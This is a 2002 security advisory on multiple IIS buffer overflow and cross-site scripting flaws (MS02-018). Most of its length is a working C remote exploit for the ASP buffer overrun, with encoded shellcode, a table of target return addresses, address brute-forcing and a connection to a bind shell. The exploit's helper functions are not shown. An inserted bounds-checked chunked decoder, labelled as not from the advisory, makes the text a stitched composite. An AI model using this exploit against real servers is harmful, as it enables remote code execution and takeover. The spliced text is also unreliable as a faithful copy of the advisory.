IIS Multiple Buffer Overflow and Cross Site Scripting



11th Apr 2002 [SBWID-5257]
COMMAND

	IIS multiple buffer overflow and cross site scripting

SYSTEMS AFFECTED

	IIS 4.0, 5.0, 5.1, 6.0: all releases and patched versions up to 11 April
	2002

PROBLEM

	 Editor's note

	 =============

	In this huge advisory Microsoft discloses up to 10 different
	vulnerabilities affecting all releases of IIS, for which a summary
	table is provided below. At least one of those (the .htr remote overflow
	that could lead to remote access to the server) was discovered by an
	independent research group [http://www.atstake.com] in February 2002
	and remained undisclosed until today ...
	

	See: [http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-018.asp]

	

	

	Additional note (24 June 2002): can you see a similarity between bugs
	n°2/3 and the recent posts about Apache ??
	

	

	 Summary of vulnerabilities / IIS versions

	 =========================================

	

	 Note :

	 ====

	IIS 6.0 is not present here: since Microsoft considers it a beta
	version, it will not disclose bug details for it. I.e. you should NOT
	use a .NET platform in a production environment ...
	

	

	                                                               |IIS|IIS|IIS|
	                                                               |4.0|5.0|5.1|
	---------------------------------------------------------------+---+---+---+
	Buffer overrun in Chunked Encoding mechanism                   |Yes|Yes|No |
	Microsoft-discovered variant of Chunked Encoding buffer overrun|Yes|Yes|Yes|
	Buffer Overrun in HTTP Header handling                         |Yes|Yes|Yes|
	Buffer Overrun in ASP Server-Side Include Function             |Yes|Yes|Yes|
	Buffer overrun in HTR ISAPI extension                          |Yes|Yes|No |
	Access violation in URL error handling                         |Yes|Yes|Yes|
	Denial of service via FTP status request                       |Yes|Yes|Yes|
	Cross-site Scripting in IIS Help File search                   |No |Yes|Yes|
	Cross-site Scripting in HTTP Error Page                        |Yes|Yes|Yes|
	Cross-site Scripting in Redirect Response message              |Yes|Yes|Yes|

	

	

	

	 Problem n°1

	 ===========

	

	 Buffer overrun in Chunked Encoding mechanism

	

	This is a buffer overrun vulnerability involving the operation of the
	chunked encoding transfer mechanism via Active Server Pages in IIS 4.0
	and 5.0. An attacker who exploited this vulnerability could overrun heap
	memory on the system, with the result of either causing the IIS service
	to fail or allowing code to be run on the server.

	See the report by eEye [http://www.eeye.com] in the file provided below.
	

	 Update (06 May 2002)

	 ======

	

	The UUencoded archive (reports.zip.uue) below has been updated with an
	exploit for this bug provided by the CHINANSL Security Team
	[http://www.chinansl.com].
	

	

	 Problem n°2

	 ===========

	

	 Microsoft-discovered variant of Chunked Encoding buffer overrun

	

	This one is related to the preceding one, but lies elsewhere within the
	ASP data transfer mechanism. It could be exploited in a similar manner
	to the preceding vulnerability, and would have the same scope. However,
	it affects IIS 4.0, 5.0, and 5.1.
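	The check that the two chunked-encoding bugs above lack, as an added example (not code from the advisory, from Microsoft or from IIS): a bounds-checked decoder for HTTP chunked bodies in C, which validates the attacker-controlled chunk size against both the bytes actually received and the space left in the output buffer before copying. The constant ADVISORY_FRAMING is constructed here to mirror the shape of the chunked POST used by the problem 4 exploit further down, with its binary values replaced by letters.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Result codes of the decoder. */
enum { CHUNK_OK = 0, CHUNK_BAD_SIZE = -1, CHUNK_TRUNCATED = -2,
       CHUNK_TOO_LARGE = -3, CHUNK_BAD_DELIM = -4 };

/* Parse one chunk-size line ("1a" or "1a;ext" followed by CRLF).
   Returns the number of bytes consumed, or a negative CHUNK_* code. */
static int parse_chunk_size(const char *in, size_t inlen, size_t *size)
{
    size_t i = 0, digits = 0, val = 0;
    for (; i < inlen; i++) {
        int c = (unsigned char)in[i], d;
        if (c >= '0' && c <= '9') d = c - '0';
        else if (c >= 'a' && c <= 'f') d = c - 'a' + 10;
        else if (c >= 'A' && c <= 'F') d = c - 'A' + 10;
        else break;
        if (++digits > 8) return CHUNK_BAD_SIZE;  /* would wrap a 32-bit length */
        val = val * 16 + (size_t)d;
    }
    if (digits == 0) return CHUNK_BAD_SIZE;
    while (i < inlen && in[i] != '\r') i++;       /* ignore chunk extensions */
    if (inlen - i < 2 || in[i] != '\r' || in[i + 1] != '\n') return CHUNK_BAD_DELIM;
    *size = val;
    return (int)(i + 2);
}

/* Decode a chunked body into out (capacity outcap). On success returns
   CHUNK_OK and sets *outlen; never writes beyond out[outcap - 1]. */
int decode_chunked(const char *in, size_t inlen, char *out, size_t outcap, size_t *outlen)
{
    size_t pos = 0, written = 0, size = 0;
    for (;;) {
        int n = parse_chunk_size(in + pos, inlen - pos, &size);
        if (n < 0) return n;
        pos += (size_t)n;
        if (size == 0) break;                                  /* last chunk */
        /* The announced size is attacker data: check it against what was
           actually received and against the room left in out, before memcpy. */
        if (inlen - pos < 2 || size > inlen - pos - 2) return CHUNK_TRUNCATED;
        if (size > outcap - written) return CHUNK_TOO_LARGE;
        memcpy(out + written, in + pos, size);
        written += size;
        pos += size;
        if (in[pos] != '\r' || in[pos + 1] != '\n') return CHUNK_BAD_DELIM;
        pos += 2;
    }
    *outlen = written;
    return CHUNK_OK;
}

/* Constructed sample mirroring the chunk framing of the problem 4 exploit:
   "10" (16 bytes) is announced but only 14 bytes of data follow. */
const char ADVISORY_FRAMING[] =
    "10\r\nDDKDDKDDKDDKDD\r\n4\r\nRETT\r\n4\r\nREWR\r\n0\r\n\r\n";

/* Status of decoding a NUL-terminated body into a buffer of outcap bytes (max 256). */
int chunked_status(const char *body, size_t outcap)
{
    char out[256];
    size_t n = 0;
    if (outcap > sizeof out) outcap = sizeof out;
    return decode_chunked(body, strlen(body), out, outcap, &n);
}

/* Decoded length of a well-formed NUL-terminated body, or 0 on any error. */
size_t chunked_length(const char *body)
{
    char out[256];
    size_t n = 0;
    return decode_chunked(body, strlen(body), out, sizeof out, &n) == CHUNK_OK ? n : 0;
}

int main(void)
{
    printf("well-formed       -> %d\n", chunked_status("4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n", 256));
    printf("advisory framing  -> %d\n", chunked_status(ADVISORY_FRAMING, 256));
    printf("size > received   -> %d\n", chunked_status("FFFFFFFF\r\nxx", 256));
    printf("size > output     -> %d\n", chunked_status("5\r\nhello\r\n0\r\n\r\n", 4));
    return 0;
}
```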
	

	

	 Problem n°3

	 ===========

	

	 Buffer Overrun in HTTP header handling

	

	

	This is a buffer overrun involving how IIS 4.0, 5.0 and 5.1 process
	HTTP header information in certain cases. IIS performs a safety check
	prior to parsing the fields in HTTP headers, to ensure that the expected
	delimiter fields are present and in reasonable places. However, it is
	possible to spoof the check and convince IIS that the delimiters are
	present even when they are not. This flaw could enable an attacker to
	create a URL whose HTTP header field values would overrun a buffer used
	to process them.

	Credit goes to Entrust [http://www.entrust.com].
	

	

	 Problem n°4

	 ===========

	

	 Buffer Overrun in ASP Server-Side Include Function

	

	

	This is a Microsoft-discovered buffer overrun vulnerability in IIS 4.0,
	5.0 and 5.1 that results from an error in a safety check performed
	during server-side includes. In some cases, a user request for a web
	page is properly processed by including the file into an ASP script and
	processing it. Prior to processing the include request, IIS performs an
	operation on the user-specified file name, designed to ensure that the
	file name is valid and sized appropriately to fit in a static buffer.
	However, in some cases it could be possible to provide a bogus,
	extremely long file name in a way that would pass the safety check,
	thereby resulting in a buffer overrun.
	

	 Exploit : (24 June 2002)

	 =========

	

	 

	/*
	 *   DDK - 2k2 -
	 *
	 *   coded by NeMeS||y tnx to Birdack
	 */

	// IIS 4(NT4) - IIS 5(2K) .asp bof

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <signal.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <sys/ioctl.h>
	#include <sys/time.h>
	#include <sys/wait.h>
	#include <errno.h>
	#include <unistd.h>
	#include <fcntl.h>
	#include <netinet/in.h>
	#include <limits.h>
	#include <netdb.h>
	#include <arpa/inet.h>

	/* Address range walked when brute forcing the return address (-b). */
	#define RET_BRUTE_START             0x00400000
	#define RET_BRUTE_STOP              0x00500000

	/* Port the payload is expected to listen on after a successful hit. */
	#define PORT_BIND                   7788
	#define VERSION                     "0.3b"

	/* Payload shipped with the exploit (encoded; contains no NUL bytes, so
	   strlen() gives its length). open_back() connects to PORT_BIND afterwards. */
	unsigned char wincode[] =
	"\xeb\x18\x5f\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x05"
	"\x34\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe3\xff\xff\xff\xff"
	"\x21\x46\x30\x6b\x46\xea\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x6a\x30"
	"\x9c\x55\x55\x13\xfa\xa8\xaa\xaa\x12\x66\x66\x66\x66\x59\x30\x41"
	"\x6d\x30\x6f\x30\x46\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\x9e"
	"\x5d\x55\x55\xba\xaa\xaa\xaa\x43\x48\xac\xaa\xaa\x30\x65\x30\x6f"
	"\x30\x42\x5d\x55\x55\x27\x17\x5e\x5d\x55\x55\xce\x30\x4b\xaa\xaa"
	"\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x30\x6f\x5e"
	"\x5d\x55\x55\x55\x55\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29"
	"\x42\xad\x23\x30\x6f\x52\x5d\x55\x55\x6d\x30\x6f\x30\x4e\x5d\x55"
	"\x55\xaa\xaa\x4a\xdd\x42\xd4\xac\xaa\xaa\x29\x17\x30\x46\x5d\x55"
	"\x55\xaa\xa5\x30\x6f\x77\xab\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55"
	"\x30\x6b\x6b\xaa\xaa\xab\xaa\x23\x27\x30\x4e\x5d\x55\x55\x30\x6b"
	"\x17\x30\x4e\x5d\x55\x55\xaa\xaa\xaa\xd2\xdf\xa0\x6d\x30\x6f\x30"
	"\x4e\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x30\x7f\x30\x4e\x5d\x55\x55"
	"\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x30\x6f\x30\x70\xab"
	"\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55\x21\xfb\x96\x21\x30\x6f\x30"
	"\x4e\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba\x30\x6b\x53\xfa\xef\xaa"
	"\xaa\xa5\x30\x6f\xd3\xab\xaa\xaa\x21\x30\x7f\x30\x4e\x5d\x55\x55"
	"\x21\xe8\x96\x21\x27\x30\x4e\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x30"
	"\x7f\x30\x4e\x5d\x55\x55\x23\x30\x7f\x30\x4a\x5d\x55\x55\x21\x30"
	"\x6f\x30\x4a\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x30\x4e\x5d\x55\x55"
	"\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x30\x6b\x90"
	"\xe1\xef\xf8\xe4\xa5\x30\x6f\x99\xab\xaa\xaa\x21\x30\x6f\x36\x5d"
	"\x55\x55\x30\x6b\xd2\xae\xef\xe6\x99\x98\xa5\x30\x6f\x8a\xab\xaa"
	"\xaa\x21\x27\x30\x4e\x5d\x55\x55\x23\x27\x3e\x5d\x55\x55\x21\x30"
	"\x7f\x30\x4a\x5d\x55\x55\x21\x30\x6f\x30\x4e\x5d\x55\x55\xa9\xe8"
	"\x8a\x23\x30\x6f\x36\x5d\x55\x55\x6d\x30\x6f\x32\x5d\x55\x55\xaa"
	"\xaa\xaa\xaa\x41\xb4\x21\x27\x32\x5d\x55\x55\x29\x6b\xab\x23\x27"
	"\x32\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x29\x68\xae\x23\x30"
	"\x7f\x36\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\x27\x32"
	"\x5d\x55\x55\x91\xe2\xb2\xa5\x27\x6a\xaa\xaa\xaa\x21\x30\x7f\x36"
	"\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\x96\xab"
	"\xed\xcf\xde\xfa\xa5\x30\x6f\x30\x4a\xaa\xaa\xaa\x21\x30\x7f\x36"
	"\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\xd6\xab"
	"\xae\xd8\xc5\xc9\xeb\xa5\x30\x6f\x30\x6e\xaa\xaa\xaa\x21\x30\x7f"
	"\x32\x5d\x55\x55\xa9\x30\x7f\x32\x5d\x55\x55\xa9\x30\x7f\x30\x4e"
	"\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\xe2\x8e\x99\x6a"
	"\xcc\x21\xae\xa0\x23\x30\x6f\x36\x5d\x55\x55\x21\x27\x30\x4a\x5d"
	"\x55\x55\x21\xfb\xba\x21\x30\x6f\x36\x5d\x55\x55\x27\xe6\xba\x55"
	"\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f"
	"\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d"
	"\x55\x55\xa9\x30\x7f\x30\x4e\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d"
	"\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x30\x7f\x36\x5d\x55\x55\x21"
	"\x30\x6f\x36\x5d\x55\x55\xa9\x30\x6f\x30\x4e\x5d\x55\x55\x23\x30"
	"\x6f\x30\x46\x5d\x55\x55\x41\xaf\x43\xa7\x55\x55\x55\x43\xbc\x54"
	"\x55\x55\x27\x17\x5e\x5d\x55\x55\x21\xed\xa2\xce\x30\x49\xaa\xaa"
	"\xaa\xaa\x29\x17\x30\x46\x5d\x55\x55\xaa\xdf\xaf\x43\xdf\xae\xaa"
	"\xaa\x21\x27\x30\x42\x5d\x55\x55\xcc\x21\xbb\xcc\x23\x30\x7f\x86"
	"\x5d\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29\x6a\xa8\x23\x30"
	"\x6f\x30\x42\x5d\x55\x55\x6d\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa"
	"\xaa\x41\xa5\x21\x27\x36\x5d\x55\x55\x29\x6b\xab\x23\x27\x36\x5d"
	"\x55\x55\x29\x17\x36\x5d\x55\x55\xbb\xa5\x27\x30\x7f\xaa\xaa\xaa"
	"\x29\x17\x36\x5d\x55\x55\xa2\xdf\xb4\x21\x5e\x21\x30\x7f\x30\x42"
	"\x5d\x55\x55\xf8\x55\x30\x7f\x1e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
	"\xe9\xe1\x23\x30\x6f\x3e\x5d\x55\x55\x41\x80\x21\x5e\x21\x30\x6f"
	"\x30\x42\x5d\x55\x55\xfa\x21\x27\x3e\x5d\x55\x55\xfb\x55\x30\x7f"
	"\x30\x46\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x30\x7f\x36"
	"\x5d\x55\x55\x23\x30\x6e\x30\x7f\x1a\x5d\x55\x55\x41\xa5\x21\x30"
	"\x6f\x30\x42\x5d\x55\x55\x29\x6a\xab\x23\x30\x6f\x30\x42\x5d\x55"
	"\x55\x21\x27\x30\x42\x5d\x55\x55\xa5\x14\xbb\x30\x6f\x78\xdf\xba"
	"\x21\x30\x6f\x30\x42\x5d\x55\x55\xa5\x14\xe2\xab\x30\x6f\x63\xde"
	"\xa8\x41\xa8\x41\x78\x21\x30\x7f\x30\x42\x5d\x55\x55\x29\x68\xab"
	"\x23\x30\x7f\x30\x42\x5d\x55\x55\x43\xe5\x55\x55\x55\x21\x5e\xc0"
	"\xac\xc0\xab\xc0\xa8\x55\x30\x7f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9"
	"\xe1\xe9\xe1\x23\x30\x6f\xe6\x5d\x55\x55\xcc\x6d\x30\x6f\x92\x5d"
	"\x55\x55\xa8\xaa\xcc\x21\x30\x6f\x86\x5d\x55\x55\xcc\x23\x30\x6f"
	"\x90\x5d\x55\x55\x6d\x30\x6f\x96\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d"
	"\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa\xaa\x29\x17\x36\x5d\x55\x55"
	"\xaa\xde\xf5\x21\x5e\xc0\xba\x27\x27\x92\x5d\x55\x55\xfb\x21\x30"
	"\x7f\xe6\x5d\x55\x55\xf8\x55\x30\x7f\x72\x5d\x55\x55\x91\x5e\x3a"
	"\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\xcc\x21\x30\x6f\x90"
	"\x5d\x55\x55\xcc\xaf\xaa\xab\xcc\x23\x30\x6f\x90\x5d\x55\x55\x21"
	"\x27\x90\x5d\x55\x55\x30\x6b\x4b\x55\x55\xaa\xaa\x30\x6b\x53\xaa"
	"\xab\xaa\xaa\xd7\xb8\xcc\x21\x30\x7f\x90\x5d\x55\x55\xcc\x29\x68"
	"\xab\xcc\x23\x30\x7f\x90\x5d\x55\x55\x41\x32\x21\x5e\xc0\xa0\x21"
	"\x30\x6f\xe6\x5d\x55\x55\xfa\x55\x30\x7f\x76\x5d\x55\x55\x91\x5e"
	"\x3a\xe9\xe1\xe9\xe1\x13\xab\xaa\xaa\xaa\x30\x6f\x63\xa5\x30\x6e"
	"\x6c\xa8\xaa\xaa\x21\x5e\x27\x30\x7f\x9e\x5d\x55\x55\xf8\x27\x30"
	"\x6f\x92\x5d\x55\x55\xfa\x21\x27\xe6\x5d\x55\x55\xfb\x55\x30\x7f"
	"\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\xe2\x5d"
	"\x55\x55\x6d\x30\x6f\xaa\x5d\x55\x55\xa6\xaa\xaa\xaa\x6d\x30\x6f"
	"\xae\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\xa2\x5d\x55\x55\xab"
	"\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27"
	"\x30\x6f\xbe\x5d\x55\x55\xfa\x27\x27\xb2\x5d\x55\x55\xfb\x55\x30"
	"\x7f\x12\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x5e\xc0\xaa"
	"\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27\x30\x6f\xa6\x5d\x55\x55\xfa"
	"\x27\x27\xba\x5d\x55\x55\xfb\x55\x30\x7f\x12\x5d\x55\x55\x91\x5e"
	"\x3a\xe9\xe1\xe9\xe1\x27\x17\xfa\x5d\x55\x55\x99\x6a\x13\xbb\xaa"
	"\xaa\xaa\x58\x30\x41\x6d\x30\x6f\xd6\x5d\x55\x55\xab\xab\xaa\xaa"
	"\xcc\x6d\x30\x6f\x2a\x5d\x55\x55\xaa\xaa\x21\x30\x7f\xba\x5d\x55"
	"\x55\x23\x30\x7f\x22\x5d\x55\x55\x21\x30\x6f\xbe\x5d\x55\x55\x23"
	"\x30\x6f\x26\x5d\x55\x55\x21\x27\xbe\x5d\x55\x55\x23\x27\x3a\x5d"
	"\x55\x55\x21\x5e\x27\x30\x7f\xb6\x5d\x55\x55\xf8\x27\x30\x6f\xfa"
	"\x5d\x55\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa"
	"\x21\x27\x30\x42\x5d\x55\x55\xfb\xc0\xaa\x55\x30\x7f\x16\x5d\x55"
	"\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\x21"
	"\x5e\xc0\xaa\xc0\xaa\x27\x30\x7f\x9a\x5d\x55\x55\xf8\xc2\xaa\xae"
	"\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xb2\x5d\x55\x55"
	"\xfb\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x30"
	"\x50\xab\xaa\xaa\xaa\x30\x6f\x78\xa5\x30\x6e\xdf\xab\xaa\xaa\x21"
	"\x5e\xc0\xaa\xc0\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\xc2\xaa\xae"
	"\xaa\xaa\x27\x27\xaa\x52\x55\x55\xfb\x21\x30\x7f\xb2\x5d\x55\x55"
	"\xf8\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29"
	"\x17\x9a\x5d\x55\x55\xaa\xa5\x24\x30\x6e\xaa\xaa\xaa\x21\x5e\xc0"
	"\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\x21\x27\x9a\x5d\x55\x55\xfb"
	"\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xb2\x5d\x55\x55\xfa"
	"\x55\x30\x7f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29\x17"
	"\x9a\x5d\x55\x55\xaa\xd4\x82\x21\x5e\xc0\xaa\x21\x27\x9a\x5d\x55"
	"\x55\xfb\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xe2\x5d\x55"
	"\x55\xfa\x55\x30\x7f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1"
	"\x41\x8b\x21\x5e\xc0\xaa\xc0\xa2\x21\x27\x30\x42\x5d\x55\x55\xfb"
	"\x21\x30\x7f\xe2\x5d\x55\x55\xf8\x55\x30\x7f\x4e\x5d\x55\x55\x91"
	"\x5e\x3a\xe9\xe1\xe9\xe1\x43\x18\xaa\xaa\xaa\x21\x5e\xc0\xaa\xc2"
	"\xaa\xae\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xe2\x5d"
	"\x55\x55\xfb\x55\x30\x7f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
	"\xe1\x23\x30\x6f\x9a\x5d\x55\x55\x29\x17\x9a\x5d\x55\x55\xaa\xd5"
	"\xf8\x6d\x30\x6f\x9a\x5d\x55\x55\xac\xaa\xaa\xaa\x21\x5e\xc0\xaa"
	"\x27\x30\x7f\x9a\x5d\x55\x55\xf8\x21\x30\x6f\x9a\x5d\x55\x55\xfa"
	"\x21\x27\x30\x42\x5d\x55\x55\x29\x6b\xa2\xfb\x21\x30\x7f\xa6\x5d"
	"\x55\x55\xf8\x55\x30\x7f\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
	"\xe1\x21\x5e\x21\x30\x6f\xe2\x5d\x55\x55\xfa\x55\x30\x7f\x5a\x5d"
	"\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x41\x98\x21\x5e\xc0\xaa\x27"
	"\x27\x9a\x5d\x55\x55\xfb\x21\x30\x7f\x9a\x5d\x55\x55\xf8\x27\x30"
	"\x6f\xaa\x52\x55\x55\xfa\x21\x27\xa6\x5d\x55\x55\xfb\x55\x30\x7f"
	"\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\xd4\x54\x55\x55"
	"\x43\x87\x57\x55\x55\x41\x54\xf2\xfa\x21\x17\x30\x42\x5d\x55\x55"
	"\x23\xed\x58\x69\x21\xee\x8e\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee"
	"\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\xb3\x53\x55\x55\xb4\xc6\xe6"
	"\xc5\xcb\xce\xe6\xc3\xc8\xd8\xcb\xd8\xd3\xeb\xaa\xe9\xd8\xcf\xcb"
	"\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde\xcf\xfa\xd8\xc5"
	"\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce\xc6"
	"\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa"
	"\xf8\xcf\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3"
	"\xc6\xcf\xaa\xdd\xd9\xc5\xc9\xc1\x99\x98\x84\xce\xc6\xc6\xaa\xd9"
	"\xc5\xc9\xc1\xcf\xde\xaa\xc8\xc3\xc4\xce\xaa\xc6\xc3\xd9\xde\xcf"
	"\xc4\xaa\xcb\xc9\xc9\xcf\xda\xde\xaa\xd9\xcf\xc4\xce\xaa\xd8\xcf"
	"\xc9\xdc\xaa\xc3\xc5\xc9\xde\xc6\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9"
	"\xc6\xc5\xd9\xcf\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9\xc7\xce\x84\xcf"
	"\xd2\xcf\xaa\xcf\xd2\xc3\xde\xa7\xa0\xaa";

	/* Per-target constants: return address, pointer value rewritten on the
	   heap, port and ASP path to request. def 666 terminates the list. */
	struct {
	    int          def;
	    char        *descr;
	    unsigned int ret;
	    unsigned int rewrite;
	    int          port;
	    char         path[256];
	} target[] = {
	    {0,   " IIS5 Windows 2000 by hsj",            0x0045C560, 0x77eaf44c, 80, "/iisstart.asp"},
	    {1,   " IIS5 Windows 2000 Chinese SP0 - SP1", 0x0045C560, 0x77ec044c, 80, "/iisstart.asp"},
	    {2,   " IIS5 Windows 2000 Chinese SP2",       0x0045C560, 0x77ebf44c, 80, "/iisstart.asp"},
	    {3,   " IIS5 Windows 2000 English SP2",       0x0045C560, 0x77edf44c, 80, "/iisstart.asp"},
	    {4,   " IIS4 Windows NT4",                    0,          0,          80, "/iisstart.asp"},
	    {666, NULL,                                   0,          0,          0,  ""}
	};

	#define NTARGETS ((int)(sizeof(target) / sizeof(target[0])) - 1)

	int sel = 0;

	in_addr_t resolve(char *IP);
	int  make_connection(char *address, int port);
	int  open_back(char *host, int port);
	void l33thax0r(int sock);
	void usage(char *name);

	int main(int argc, char **argv)
	{
	    int i, cnt, sock;
	    int brute = 0;
	    unsigned int step = 0;
	    char buf[8192], buf2[16384], host[1024] = "";
	    unsigned int ret_start, ret_stop, ret_step, ret_1;
	    size_t codelen = strlen((char *)wincode);

	    fprintf(stderr, "\n IIS4(NT4) - IIS5(2K) .asp buffer overflow remote exploit "
	            "- DDK Crew 2k2 - (version " VERSION ")\n"
	            " by NeMeS||y and Birdack\n\n");

	    if (argc == 1) usage(argv[0]);

	    while ((cnt = getopt(argc, argv, "h:t:p:f:b:")) != -1)
	    {
	        switch (cnt)
	        {
	        case 'h':
	            strncpy(host, optarg, sizeof(host));
	            host[sizeof(host) - 1] = '\x00';
	            break;
	        case 't':
	            sel = atoi(optarg);
	            if (sel < 0 || sel >= NTARGETS) usage(argv[0]);  /* stay inside target[] */
	            break;
	        case 'p':
	            target[sel].port = atoi(optarg);
	            break;
	        case 'f':
	            strncpy(target[sel].path, optarg, sizeof(target[sel].path));
	            target[sel].path[sizeof(target[sel].path) - 1] = '\x00';
	            break;
	        case 'b':
	            brute = 1;
	            step = atoi(optarg);
	            break;
	        default:
	            usage(argv[0]);
	            break;
	        }
	    }

	    if (target[sel].def == 4) brute = 1; // ;>  (no fixed addresses for NT4)

	    sock = make_connection(host, target[sel].port);
	    if (sock < 0)
	    {
	        printf("Error -> [ %d ] not connected.\n\n", sock);
	        return -3;
	    }
	    if (brute == 0)
	    {
	        ret_start = target[sel].ret;
	        ret_step  = 1;
	        ret_stop  = target[sel].ret;
	    } else {
	        ret_start = RET_BRUTE_START;
	        ret_step  = step ? step : 1;   /* a zero step would never terminate */
	        ret_stop  = RET_BRUTE_STOP;
	    }

	    printf("\n [+] Start\n\n  host\t->\t%s\n  port\t->\t%d\n  path\t->\t%s\n  type\t->\t%s\n\n\n",
	           host, target[sel].port, target[sel].path, target[sel].descr);

	    if (brute == 1) printf("\n [+] Brute forcing enabled... do u have time?\n\n");

	    for (ret_1 = ret_start; ret_1 <= ret_stop; ret_1 += ret_step)
	    {
	        /* Query string: a sled of short jumps (eb 06), 12 bytes of 'A'
	           padding, and the payload at the very end of the buffer. */
	        for (i = 0; i < (int)(sizeof(buf) - codelen - 12 - 1);)
	        {
	            buf[i++] = 0xeb;
	            buf[i++] = 0x06;
	        }
	        *(unsigned int *)&buf[i]     = 0x41414141;
	        *(unsigned int *)&buf[i + 4] = 0x41414141;
	        *(unsigned int *)&buf[i + 8] = 0x41414141;

	        memcpy(&buf[sizeof(buf) - codelen - 1], wincode, codelen);
	        buf[sizeof(buf) - 1] = 0;

	        /* Chunked POST. The first chunk deliberately announces 0x10 bytes
	           but carries 14; RETT and REWR are placeholders overwritten below
	           with the return address and the pointer value to rewrite. */
	        sprintf(buf2, "POST %s?%s HTTP/1.0\r\n"
	                      "Content-Type: application/x-www-form-urlencoded\r\n"
	                      "Transfer-Encoding: chunked\r\n\r\n"
	                      "10\r\nDDKDDKDDKDDKDD\r\n"
	                      "4\r\nRETT\r\n"
	                      "4\r\nREWR\r\n"
	                      "0\r\n\r\n\r\n",
	                      target[sel].path, buf);

	        *(unsigned int *)strstr(buf2, "REWR") = target[sel].rewrite;
	        *(unsigned int *)strstr(buf2, "RETT") = ret_1;
	        if (brute == 0) printf(" # Sending buffer to socket : ");
	        write(sock, buf2, strlen(buf2));

	        fprintf(stderr, " [+] ret : 0x%08x ->", ret_1);

	        sleep(3);
	        if (brute == 0) printf("DONE!\n\n");
	        shutdown(sock, 2);
	        close(sock);
	        printf(" # connecting to our shell - port : [ %d ]\n", PORT_BIND);
	        sock = open_back(host, PORT_BIND);
	        if (sock == -1 && brute == 0)
	        {
	            printf("\n [-] FAILED ");
	            printf("exiting now!\n\n");
	            exit(-1);
	        }
	        if (sock != -1)
	        {
	            printf("\n\n[+] Address guessed!! \n\n");
	            printf("...OH oH OH... done! our evilcode has worked baby at [ 0x%08x ]\n", ret_1);
	            l33thax0r(sock);
	            exit(0);
	        }
	    }

	    return 0;
	}

